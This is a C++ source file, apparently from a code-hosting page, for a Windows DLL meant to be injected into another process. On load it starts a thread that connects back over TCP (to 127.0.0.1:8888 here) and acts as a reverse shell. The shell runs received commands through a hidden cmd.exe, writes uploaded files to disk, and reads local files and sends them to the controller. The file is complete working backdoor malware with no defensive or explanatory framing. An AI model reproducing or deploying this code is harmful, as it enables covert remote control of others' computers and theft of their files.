-
Notifications
You must be signed in to change notification settings - Fork 2
/
main.cpp
127 lines (121 loc) · 2.93 KB
/
main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#include "stdio.h"
#include "stdlib.h"
#include <iostream>
#include "windows.h"
#pragma comment(lib,"ws2_32.lib")
using namespace std;
DWORD WINAPI ThreadProc(LPVOID lParam)
{
MessageBox(NULL,"aaa",NULL,MB_OK);
fflush(stdin);
SOCKET shellsocket;
WSADATA wsadata;
WORD sockversion = MAKEWORD(2,2);
char test[256] = "shell success!\r\n";
char cmdline[256] = {0};
char result[4096] = {0};
if(WSAStartup(sockversion,&wsadata)!=0)
{
return 0;
}
sockaddr_in sin;
sin.sin_family = AF_INET;
sin.sin_port = htons(8888);
sin.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
shellsocket = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
connect(shellsocket,(LPSOCKADDR)&sin,sizeof(sin));
send(shellsocket,test,strlen(test),0);
while(1)
{
memset(cmdline,0,256);
char recvcmd[256] = {0};
int len = recv(shellsocket,recvcmd,256,NULL);
string tmp = recvcmd;
if(len == SOCKET_ERROR)
{
printf("recv error");
return 0;
}
if(strcmp(recvcmd,"-e") == 0)
{
printf("success exit!");
closesocket(shellsocket);
return 0;
}
else if(strncmp(recvcmd,"-u",2) == 0)
{
char path[100];
char filebuff[4096] = {0};
int filelen = recv(shellsocket,filebuff,4096,NULL);
strcpy(path,tmp.substr(tmp.rfind(" ")+1,tmp.length()-1).c_str());
FILE *f = fopen(path,"w+");
//puts(filebuff);
fflush(stdin);
fwrite(filebuff,1,strlen(filebuff),f);
fclose(f);
}
else if(strncmp(recvcmd,"-d",2) == 0)
{
char path[100];
char filebuff[4096] = {0};
DWORD filelen;
strcpy(path,tmp.substr(tmp.find(" ")+1,tmp.rfind(" ")-2).c_str());
FILE *f = fopen(path,"r+");
fread(filebuff,1,4096,f);
send(shellsocket,filebuff,strlen(filebuff),0);
fclose(f);
}
else
{
SECURITY_ATTRIBUTES sa;
HANDLE hread,hwrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
if(!CreatePipe(&hread,&hwrite,(LPSECURITY_ATTRIBUTES)&sa,0))
{
printf("pipe error");
return 0;
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hwrite;
si.hStdOutput = hwrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
GetSystemDirectory(cmdline,sizeof(cmdline));
strcat(cmdline,"\\cmd.exe /c");
strncat(cmdline,recvcmd,strlen(recvcmd));
if(!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
printf("exec error");
return 0;
}
CloseHandle(hwrite);
DWORD readlen;
while(ReadFile(hread,result,4096,&readlen,NULL))
{
send(shellsocket,result,readlen,0);
printf("result:\n");
puts(result);
memset(result,0,1024);
}
}
}
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpvResvered)
{
HANDLE hthread = NULL;
switch(dwReason)
{
case DLL_PROCESS_ATTACH:
OutputDebugString("inject success!!!");
hthread = CreateThread(NULL,0,ThreadProc,NULL,0,NULL);
CloseHandle(hthread);
break;
}
return TRUE;
}